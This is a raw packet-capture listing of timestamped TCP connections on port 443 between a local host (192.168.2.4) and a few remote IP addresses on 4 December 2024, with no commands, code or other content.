                                                                                                                              Dec 4, 2024 21:16:05.796242952 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.846031904 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.891998053 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.892007113 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.920052052 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.920094967 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.920101881 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.923183918 CET44349759104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.923249006 CET44349759104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.923413038 CET49759443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.923907995 CET49759443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.923919916 CET44349759104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.927357912 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.927397013 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.927479982 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.927674055 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.927683115 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.927876949 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.927920103 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.927926064 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.936039925 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.936084986 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.936090946 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.945105076 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.945146084 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.945152044 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.952073097 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.952111959 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.952116966 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.959453106 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.959495068 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.959498882 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.967613935 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.967648029 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.967652082 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.975362062 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.975406885 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.975413084 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.992013931 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.992038965 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.992055893 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.992063046 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:05.992105961 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:05.997463942 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.004301071 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.004419088 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.004446030 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.004453897 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.004493952 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.011576891 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.054388046 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.116213083 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.119204044 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.119246960 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.119263887 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.126903057 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.126945972 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.126952887 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.134021044 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.134069920 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.134077072 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.134119987 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.148504019 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.148509979 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.148561001 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.155600071 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.155734062 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.165299892 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.165306091 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.165347099 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.177059889 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.177109003 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.187261105 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.187309980 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.195991993 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.196039915 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.200809956 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.200853109 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.210220098 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.210278034 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.220052004 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.220097065 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.224340916 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.224387884 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.233922005 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.233971119 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.243423939 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.243491888 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.250422955 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.250473022 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.316277981 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.316329002 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.325568914 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.325614929 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.330372095 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.330420971 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.335170984 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.335215092 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.335220098 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.335244894 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.335263968 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.335288048 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.335364103 CET49758443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.335378885 CET44349758104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.340607882 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.340656042 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.340714931 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.340894938 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.340905905 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.390410900 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:16:06.431330919 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.515131950 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.515163898 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.515222073 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.515626907 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:06.515647888 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.868910074 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.868973017 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:06.869118929 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:16:06.871012926 CET49746443192.168.2.4172.67.164.164
                                                                                                                              Dec 4, 2024 21:16:06.871033907 CET44349746172.67.164.164192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.015644073 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:07.015666008 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.020188093 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:07.023199081 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:07.023211956 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.161345959 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.161931038 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.161957026 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.162272930 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.164685965 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.164745092 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.164865017 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.211338997 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.738220930 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.738414049 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.738461971 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.738812923 CET49763443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.738831997 CET44349763104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.740109921 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.740452051 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.740472078 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.740772963 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.741105080 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.741168976 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.741213083 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.741899967 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.742554903 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.742573977 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.742871046 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.743340015 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.743408918 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.743483067 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.743521929 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:07.743545055 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:07.787333012 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.238863945 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.239089012 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.239120960 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.239136934 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.239322901 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.239348888 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.239358902 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.239366055 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.239398003 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.239401102 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.248045921 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.248096943 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.248101950 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.264142990 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.264188051 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.264194012 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.305978060 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.323713064 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.323762894 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.323803902 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.323806047 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.323822975 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.323862076 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.323868990 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.333549976 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.333594084 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.333601952 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.346992016 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.347037077 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.347049952 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.381262064 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.398617029 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.418910980 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.419116020 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:08.419135094 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.420075893 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.420123100 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:08.421066999 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:08.421132088 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.421161890 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:08.424850941 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.424856901 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.434887886 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.434922934 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.434927940 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.441428900 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.441468954 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.441473961 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.445209026 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.449327946 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.449383974 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.449394941 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.449861050 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.449904919 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.449908972 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.458240986 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.458287954 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.458295107 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.462148905 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:08.462157965 CET4434976735.190.80.1192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.466429949 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.466480017 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.466491938 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.474796057 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.474841118 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.474847078 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.491143942 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.491184950 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.491195917 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.492981911 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.492995024 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.499355078 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.499389887 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.499397039 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.507711887 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.507740974 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.507749081 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.507755995 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.507790089 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.508260965 CET49767443192.168.2.435.190.80.1
                                                                                                                              Dec 4, 2024 21:16:08.516140938 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.517771959 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.517818928 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.517832994 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.525073051 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.525122881 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.525130033 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.526732922 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.526779890 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.526789904 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.534085989 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.534127951 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.534137964 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.542457104 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.542507887 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.542516947 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.556865931 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.556907892 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.556915998 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.564651966 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.564687967 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.564696074 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.564704895 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.564749956 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.570614100 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.572176933 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.580018044 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.580130100 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.580157042 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.580166101 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.580578089 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.587886095 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.595711946 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.596004009 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.596010923 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.602262020 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.602596998 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.602603912 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.608742952 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.609181881 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.609189034 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.635896921 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.639651060 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.642183065 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.642191887 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.649310112 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.649394989 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.649446964 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.649452925 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.649501085 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.656477928 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.664160013 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.667424917 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.667496920 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.667504072 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.667571068 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.671274900 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.671283007 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.671406984 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.675213099 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.675338984 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.682398081 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.682404995 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.682461977 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.686156034 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.686234951 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.693582058 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.693655968 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.701009989 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.701056004 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.707828999 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.708493948 CET44349764104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.708565950 CET49764443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.710988045 CET44349765104.18.94.41192.168.2.4
                                                                                                                              Dec 4, 2024 21:16:08.711098909 CET49765443192.168.2.4104.18.94.41
                                                                                                                              Dec 4, 2024 21:16:08.711112976 CET44349765104.18.94.41192.168.2.4
